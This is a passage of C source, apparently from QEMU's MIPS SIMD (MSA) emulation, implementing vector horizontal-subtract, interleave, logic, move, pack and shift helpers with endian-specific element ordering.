&(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_hsub_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_hsub_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_hsub_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_hsub_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_hsub_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_hsub_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_hsub_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_hsub_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_hsub_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_hsub_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_hsub_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_hsub_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_hsub_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_hsub_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_hsub_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_hsub_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Interleave * ---------- * * +---------------+----------------------------------------------------------+ * | ILVEV.B | Vector Interleave Even (byte) | * | ILVEV.H | Vector Interleave Even (halfword) | * | ILVEV.W | Vector Interleave Even (word) | * | ILVEV.D | Vector Interleave Even (doubleword) | * | ILVOD.B | Vector Interleave Odd (byte) | * | ILVOD.H | Vector Interleave Odd (halfword) | * | ILVOD.W | Vector Interleave Odd (word) | * | ILVOD.D | Vector Interleave Odd (doubleword) | * | ILVL.B | Vector Interleave Left (byte) | * | ILVL.H | Vector Interleave Left (halfword) | * | ILVL.W | Vector Interleave Left (word) | * | ILVL.D | Vector Interleave Left (doubleword) | * | ILVR.B | Vector Interleave Right (byte) | * | ILVR.H | Vector Interleave Right (halfword) | * | ILVR.W | Vector Interleave Right (word) | * | ILVR.D | Vector Interleave Right (doubleword) | * +---------------+----------------------------------------------------------+ */ void helper_msa_ilvev_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[8] = pws->b[9]; pwd->b[9] = pwt->b[9]; pwd->b[10] = pws->b[11]; pwd->b[11] = pwt->b[11]; pwd->b[12] = pws->b[13]; pwd->b[13] = pwt->b[13]; pwd->b[14] = pws->b[15]; pwd->b[15] = pwt->b[15]; pwd->b[0] = pws->b[1]; pwd->b[1] = pwt->b[1]; pwd->b[2] = pws->b[3]; pwd->b[3] = pwt->b[3]; pwd->b[4] = pws->b[5]; pwd->b[5] = pwt->b[5]; pwd->b[6] = pws->b[7]; pwd->b[7] = pwt->b[7]; #else pwd->b[15] = pws->b[14]; pwd->b[14] = pwt->b[14]; pwd->b[13] = pws->b[12]; pwd->b[12] = pwt->b[12]; pwd->b[11] = pws->b[10]; pwd->b[10] = pwt->b[10]; pwd->b[9] = pws->b[8]; pwd->b[8] = pwt->b[8]; pwd->b[7] = pws->b[6]; pwd->b[6] = pwt->b[6]; pwd->b[5] = pws->b[4]; pwd->b[4] = pwt->b[4]; pwd->b[3] = pws->b[2]; pwd->b[2] = pwt->b[2]; pwd->b[1] = pws->b[0]; pwd->b[0] = pwt->b[0]; #endif } void helper_msa_ilvev_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[4] = pws->h[5]; pwd->h[5] = pwt->h[5]; pwd->h[6] = pws->h[7]; pwd->h[7] = pwt->h[7]; pwd->h[0] = pws->h[1]; pwd->h[1] = pwt->h[1]; pwd->h[2] = pws->h[3]; pwd->h[3] = pwt->h[3]; #else pwd->h[7] = pws->h[6]; pwd->h[6] = pwt->h[6]; pwd->h[5] = pws->h[4]; pwd->h[4] = pwt->h[4]; pwd->h[3] = pws->h[2]; pwd->h[2] = pwt->h[2]; pwd->h[1] = pws->h[0]; pwd->h[0] = pwt->h[0]; #endif } void helper_msa_ilvev_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[2] = pws->w[3]; pwd->w[3] = pwt->w[3]; pwd->w[0] = pws->w[1]; pwd->w[1] = pwt->w[1]; #else pwd->w[3] = pws->w[2]; pwd->w[2] = pwt->w[2]; pwd->w[1] = pws->w[0]; pwd->w[0] = pwt->w[0]; #endif } void helper_msa_ilvev_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[1] = pws->d[0]; pwd->d[0] = pwt->d[0]; } void helper_msa_ilvod_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[7] = pwt->b[6]; pwd->b[6] = pws->b[6]; pwd->b[5] = pwt->b[4]; pwd->b[4] = pws->b[4]; pwd->b[3] = pwt->b[2]; pwd->b[2] = pws->b[2]; pwd->b[1] = pwt->b[0]; pwd->b[0] = pws->b[0]; pwd->b[15] = pwt->b[14]; pwd->b[14] = pws->b[14]; pwd->b[13] = pwt->b[12]; pwd->b[12] = pws->b[12]; pwd->b[11] = pwt->b[10]; pwd->b[10] = pws->b[10]; pwd->b[9] = pwt->b[8]; pwd->b[8] = pws->b[8]; #else pwd->b[0] = pwt->b[1]; pwd->b[1] = pws->b[1]; pwd->b[2] = pwt->b[3]; pwd->b[3] = pws->b[3]; pwd->b[4] = pwt->b[5]; pwd->b[5] = pws->b[5]; pwd->b[6] = pwt->b[7]; pwd->b[7] = pws->b[7]; pwd->b[8] = pwt->b[9]; pwd->b[9] = pws->b[9]; pwd->b[10] = pwt->b[11]; pwd->b[11] = pws->b[11]; pwd->b[12] = pwt->b[13]; pwd->b[13] = pws->b[13]; pwd->b[14] = pwt->b[15]; pwd->b[15] = pws->b[15]; #endif } void helper_msa_ilvod_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[3] = pwt->h[2]; pwd->h[2] = pws->h[2]; pwd->h[1] = pwt->h[0]; pwd->h[0] = pws->h[0]; pwd->h[7] = pwt->h[6]; pwd->h[6] = pws->h[6]; pwd->h[5] = pwt->h[4]; pwd->h[4] = pws->h[4]; #else pwd->h[0] = pwt->h[1]; pwd->h[1] = pws->h[1]; pwd->h[2] = pwt->h[3]; pwd->h[3] = pws->h[3]; pwd->h[4] = pwt->h[5]; pwd->h[5] = pws->h[5]; pwd->h[6] = pwt->h[7]; pwd->h[7] = pws->h[7]; #endif } void helper_msa_ilvod_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[1] = pwt->w[0]; pwd->w[0] = pws->w[0]; pwd->w[3] = pwt->w[2]; pwd->w[2] = pws->w[2]; #else pwd->w[0] = pwt->w[1]; pwd->w[1] = pws->w[1]; pwd->w[2] = pwt->w[3]; pwd->w[3] = pws->w[3]; #endif } void helper_msa_ilvod_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = pwt->d[1]; pwd->d[1] = pws->d[1]; } void helper_msa_ilvl_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[7] = pwt->b[15]; pwd->b[6] = pws->b[15]; pwd->b[5] = pwt->b[14]; pwd->b[4] = pws->b[14]; pwd->b[3] = pwt->b[13]; pwd->b[2] = pws->b[13]; pwd->b[1] = pwt->b[12]; pwd->b[0] = pws->b[12]; pwd->b[15] = pwt->b[11]; pwd->b[14] = pws->b[11]; pwd->b[13] = pwt->b[10]; pwd->b[12] = pws->b[10]; pwd->b[11] = pwt->b[9]; pwd->b[10] = pws->b[9]; pwd->b[9] = pwt->b[8]; pwd->b[8] = pws->b[8]; #else pwd->b[0] = pwt->b[8]; pwd->b[1] = pws->b[8]; pwd->b[2] = pwt->b[9]; pwd->b[3] = pws->b[9]; pwd->b[4] = pwt->b[10]; pwd->b[5] = pws->b[10]; pwd->b[6] = pwt->b[11]; pwd->b[7] = pws->b[11]; pwd->b[8] = pwt->b[12]; pwd->b[9] = pws->b[12]; pwd->b[10] = pwt->b[13]; pwd->b[11] = pws->b[13]; pwd->b[12] = pwt->b[14]; pwd->b[13] = pws->b[14]; pwd->b[14] = pwt->b[15]; pwd->b[15] = pws->b[15]; #endif } void helper_msa_ilvl_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[3] = pwt->h[7]; pwd->h[2] = pws->h[7]; pwd->h[1] = pwt->h[6]; pwd->h[0] = pws->h[6]; pwd->h[7] = pwt->h[5]; pwd->h[6] = pws->h[5]; pwd->h[5] = pwt->h[4]; pwd->h[4] = pws->h[4]; #else pwd->h[0] = pwt->h[4]; pwd->h[1] = pws->h[4]; pwd->h[2] = pwt->h[5]; pwd->h[3] = pws->h[5]; pwd->h[4] = pwt->h[6]; pwd->h[5] = pws->h[6]; pwd->h[6] = pwt->h[7]; pwd->h[7] = pws->h[7]; #endif } void helper_msa_ilvl_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[1] = pwt->w[3]; pwd->w[0] = pws->w[3]; pwd->w[3] = pwt->w[2]; pwd->w[2] = pws->w[2]; #else pwd->w[0] = pwt->w[2]; pwd->w[1] = pws->w[2]; pwd->w[2] = pwt->w[3]; pwd->w[3] = pws->w[3]; #endif } void helper_msa_ilvl_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = pwt->d[1]; pwd->d[1] = pws->d[1]; } void helper_msa_ilvr_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[8] = pws->b[0]; pwd->b[9] = pwt->b[0]; pwd->b[10] = pws->b[1]; pwd->b[11] = pwt->b[1]; pwd->b[12] = pws->b[2]; pwd->b[13] = pwt->b[2]; pwd->b[14] = pws->b[3]; pwd->b[15] = pwt->b[3]; pwd->b[0] = pws->b[4]; pwd->b[1] = pwt->b[4]; pwd->b[2] = pws->b[5]; pwd->b[3] = pwt->b[5]; pwd->b[4] = pws->b[6]; pwd->b[5] = pwt->b[6]; pwd->b[6] = pws->b[7]; pwd->b[7] = pwt->b[7]; #else pwd->b[15] = pws->b[7]; pwd->b[14] = pwt->b[7]; pwd->b[13] = pws->b[6]; pwd->b[12] = pwt->b[6]; pwd->b[11] = pws->b[5]; pwd->b[10] = pwt->b[5]; pwd->b[9] = pws->b[4]; pwd->b[8] = pwt->b[4]; pwd->b[7] = pws->b[3]; pwd->b[6] = pwt->b[3]; pwd->b[5] = pws->b[2]; pwd->b[4] = pwt->b[2]; pwd->b[3] = pws->b[1]; pwd->b[2] = pwt->b[1]; pwd->b[1] = pws->b[0]; pwd->b[0] = pwt->b[0]; #endif } void helper_msa_ilvr_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[4] = pws->h[0]; pwd->h[5] = pwt->h[0]; pwd->h[6] = pws->h[1]; pwd->h[7] = pwt->h[1]; pwd->h[0] = pws->h[2]; pwd->h[1] = pwt->h[2]; pwd->h[2] = pws->h[3]; pwd->h[3] = pwt->h[3]; #else pwd->h[7] = pws->h[3]; pwd->h[6] = pwt->h[3]; pwd->h[5] = pws->h[2]; pwd->h[4] = pwt->h[2]; pwd->h[3] = pws->h[1]; pwd->h[2] = pwt->h[1]; pwd->h[1] = pws->h[0]; pwd->h[0] = pwt->h[0]; #endif } void helper_msa_ilvr_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[2] = pws->w[0]; pwd->w[3] = pwt->w[0]; pwd->w[0] = pws->w[1]; pwd->w[1] = pwt->w[1]; #else pwd->w[3] = pws->w[1]; pwd->w[2] = pwt->w[1]; pwd->w[1] = pws->w[0]; pwd->w[0] = pwt->w[0]; #endif } void helper_msa_ilvr_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[1] = pws->d[0]; pwd->d[0] = pwt->d[0]; } /* * Logic * ----- * * +---------------+----------------------------------------------------------+ * | AND.V | Vector Logical And | * | NOR.V | Vector Logical Negated Or | * | OR.V | Vector Logical Or | * | XOR.V | Vector Logical Exclusive Or | * +---------------+----------------------------------------------------------+ */ void helper_msa_and_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = pws->d[0] & pwt->d[0]; pwd->d[1] = pws->d[1] & pwt->d[1]; } void helper_msa_nor_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = ~(pws->d[0] | pwt->d[0]); pwd->d[1] = ~(pws->d[1] | pwt->d[1]); } void helper_msa_or_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = pws->d[0] | pwt->d[0]; pwd->d[1] = pws->d[1] | pwt->d[1]; } void helper_msa_xor_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = pws->d[0] ^ pwt->d[0]; pwd->d[1] = pws->d[1] ^ pwt->d[1]; } /* * Move * ---- * * +---------------+----------------------------------------------------------+ * | MOVE.V | Vector Move | * +---------------+----------------------------------------------------------+ */ static inline void msa_move_v(wr_t *pwd, wr_t *pws) { pwd->d[0] = pws->d[0]; pwd->d[1] = pws->d[1]; } void helper_msa_move_v(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); msa_move_v(pwd, pws); } /* * Pack * ---- * * +---------------+----------------------------------------------------------+ * | PCKEV.B | Vector Pack Even (byte) | * | PCKEV.H | Vector Pack Even (halfword) | * | PCKEV.W | Vector Pack Even (word) | * | PCKEV.D | Vector Pack Even (doubleword) | * | PCKOD.B | Vector Pack Odd (byte) | * | PCKOD.H | Vector Pack Odd (halfword) | * | PCKOD.W | Vector Pack Odd (word) | * | PCKOD.D | Vector Pack Odd (doubleword) | * | VSHF.B | Vector Data Preserving Shuffle (byte) | * | VSHF.H | Vector Data Preserving Shuffle (halfword) | * | VSHF.W | Vector Data Preserving Shuffle (word) | * | VSHF.D | Vector Data Preserving Shuffle (doubleword) | * +---------------+----------------------------------------------------------+ */ void helper_msa_pckev_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[8] = pws->b[9]; pwd->b[10] = pws->b[13]; pwd->b[12] = pws->b[1]; pwd->b[14] = pws->b[5]; pwd->b[0] = pwt->b[9]; pwd->b[2] = pwt->b[13]; pwd->b[4] = pwt->b[1]; pwd->b[6] = pwt->b[5]; pwd->b[9] = pws->b[11]; pwd->b[13] = pws->b[3]; pwd->b[1] = pwt->b[11]; pwd->b[5] = pwt->b[3]; pwd->b[11] = pws->b[15]; pwd->b[3] = pwt->b[15]; pwd->b[15] = pws->b[7]; pwd->b[7] = pwt->b[7]; #else pwd->b[15] = pws->b[14]; pwd->b[13] = pws->b[10]; pwd->b[11] = pws->b[6]; pwd->b[9] = pws->b[2]; pwd->b[7] = pwt->b[14]; pwd->b[5] = pwt->b[10]; pwd->b[3] = pwt->b[6]; pwd->b[1] = pwt->b[2]; pwd->b[14] = pws->b[12]; pwd->b[10] = pws->b[4]; pwd->b[6] = pwt->b[12]; pwd->b[2] = pwt->b[4]; pwd->b[12] = pws->b[8]; pwd->b[4] = pwt->b[8]; pwd->b[8] = pws->b[0]; pwd->b[0] = pwt->b[0]; #endif } void helper_msa_pckev_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[4] = pws->h[5]; pwd->h[6] = pws->h[1]; pwd->h[0] = pwt->h[5]; pwd->h[2] = pwt->h[1]; pwd->h[5] = pws->h[7]; pwd->h[1] = pwt->h[7]; pwd->h[7] = pws->h[3]; pwd->h[3] = pwt->h[3]; #else pwd->h[7] = pws->h[6]; pwd->h[5] = pws->h[2]; pwd->h[3] = pwt->h[6]; pwd->h[1] = pwt->h[2]; pwd->h[6] = pws->h[4]; pwd->h[2] = pwt->h[4]; pwd->h[4] = pws->h[0]; pwd->h[0] = pwt->h[0]; #endif } void helper_msa_pckev_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[2] = pws->w[3]; pwd->w[0] = pwt->w[3]; pwd->w[3] = pws->w[1]; pwd->w[1] = pwt->w[1]; #else pwd->w[3] = pws->w[2]; pwd->w[1] = pwt->w[2]; pwd->w[2] = pws->w[0]; pwd->w[0] = pwt->w[0]; #endif } void helper_msa_pckev_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[1] = pws->d[0]; pwd->d[0] = pwt->d[0]; } void helper_msa_pckod_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->b[7] = pwt->b[6]; pwd->b[5] = pwt->b[2]; pwd->b[3] = pwt->b[14]; pwd->b[1] = pwt->b[10]; pwd->b[15] = pws->b[6]; pwd->b[13] = pws->b[2]; pwd->b[11] = pws->b[14]; pwd->b[9] = pws->b[10]; pwd->b[6] = pwt->b[4]; pwd->b[2] = pwt->b[12]; pwd->b[14] = pws->b[4]; pwd->b[10] = pws->b[12]; pwd->b[4] = pwt->b[0]; pwd->b[12] = pws->b[0]; pwd->b[0] = pwt->b[8]; pwd->b[8] = pws->b[8]; #else pwd->b[0] = pwt->b[1]; pwd->b[2] = pwt->b[5]; pwd->b[4] = pwt->b[9]; pwd->b[6] = pwt->b[13]; pwd->b[8] = pws->b[1]; pwd->b[10] = pws->b[5]; pwd->b[12] = pws->b[9]; pwd->b[14] = pws->b[13]; pwd->b[1] = pwt->b[3]; pwd->b[5] = pwt->b[11]; pwd->b[9] = pws->b[3]; pwd->b[13] = pws->b[11]; pwd->b[3] = pwt->b[7]; pwd->b[11] = pws->b[7]; pwd->b[7] = pwt->b[15]; pwd->b[15] = pws->b[15]; #endif } void helper_msa_pckod_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->h[3] = pwt->h[2]; pwd->h[1] = pwt->h[6]; pwd->h[7] = pws->h[2]; pwd->h[5] = pws->h[6]; pwd->h[2] = pwt->h[0]; pwd->h[6] = pws->h[0]; pwd->h[0] = pwt->h[4]; pwd->h[4] = pws->h[4]; #else pwd->h[0] = pwt->h[1]; pwd->h[2] = pwt->h[5]; pwd->h[4] = pws->h[1]; pwd->h[6] = pws->h[5]; pwd->h[1] = pwt->h[3]; pwd->h[5] = pws->h[3]; pwd->h[3] = pwt->h[7]; pwd->h[7] = pws->h[7]; #endif } void helper_msa_pckod_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); #if defined(HOST_WORDS_BIGENDIAN) pwd->w[1] = pwt->w[0]; pwd->w[3] = pws->w[0]; pwd->w[0] = pwt->w[2]; pwd->w[2] = pws->w[2]; #else pwd->w[0] = pwt->w[1]; pwd->w[2] = pws->w[1]; pwd->w[1] = pwt->w[3]; pwd->w[3] = pws->w[3]; #endif } void helper_msa_pckod_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = pwt->d[1]; pwd->d[1] = pws->d[1]; } /* * Shift * ----- * * +---------------+----------------------------------------------------------+ * | SLL.B | Vector Shift Left (byte) | * | SLL.H | Vector Shift Left (halfword) | * | SLL.W | Vector Shift Left (word) | * | SLL.D | Vector Shift Left (doubleword) | * | SRA.B | Vector Shift Right Arithmetic (byte) | * | SRA.H | Vector Shift Right Arithmetic (halfword) | * | SRA.W | Vector Shift Right Arithmetic (word) | * | SRA.D | Vector Shift Right Arithmetic (doubleword) | * | SRAR.B | Vector Shift Right Arithmetic Rounded (byte) | * | SRAR.H | Vector Shift Right Arithmetic Rounded (halfword) | * | SRAR.W | Vector Shift Right Arithmetic Rounded (word) | * | SRAR.D | Vector Shift Right Arithmetic Rounded (doubleword) | * | SRL.B | Vector Shift Right Logical (byte) | * | SRL.H | Vector Shift Right Logical (halfword) | * | SRL.W | Vector Shift Right Logical (word) | * | SRL.D | Vector Shift Right Logical (doubleword) | * | SRLR.B | Vector Shift Right Logical Rounded (byte) | * | SRLR.H | Vector Shift Right Logical Rounded (halfword) | * | SRLR.W | Vector Shift Right Logical Rounded (word) | * | SRLR.D | Vector Shift Right Logical Rounded (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_sll_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); return arg1 << b_arg2; } void helper_msa_sll_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_sll_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_sll_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_sll_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_sll_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_sll_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_sll_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_sll_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_sll_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_sll_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_sll_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_sll_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_sll_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_sll_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_sll_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_sll_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_sll_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_sll_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_sll_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_sll_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_sll_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_sll_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_sll_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_sll_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_sll_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_sll_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_sll_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_sll_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_sll_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_sll_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_sll_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_sll_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = 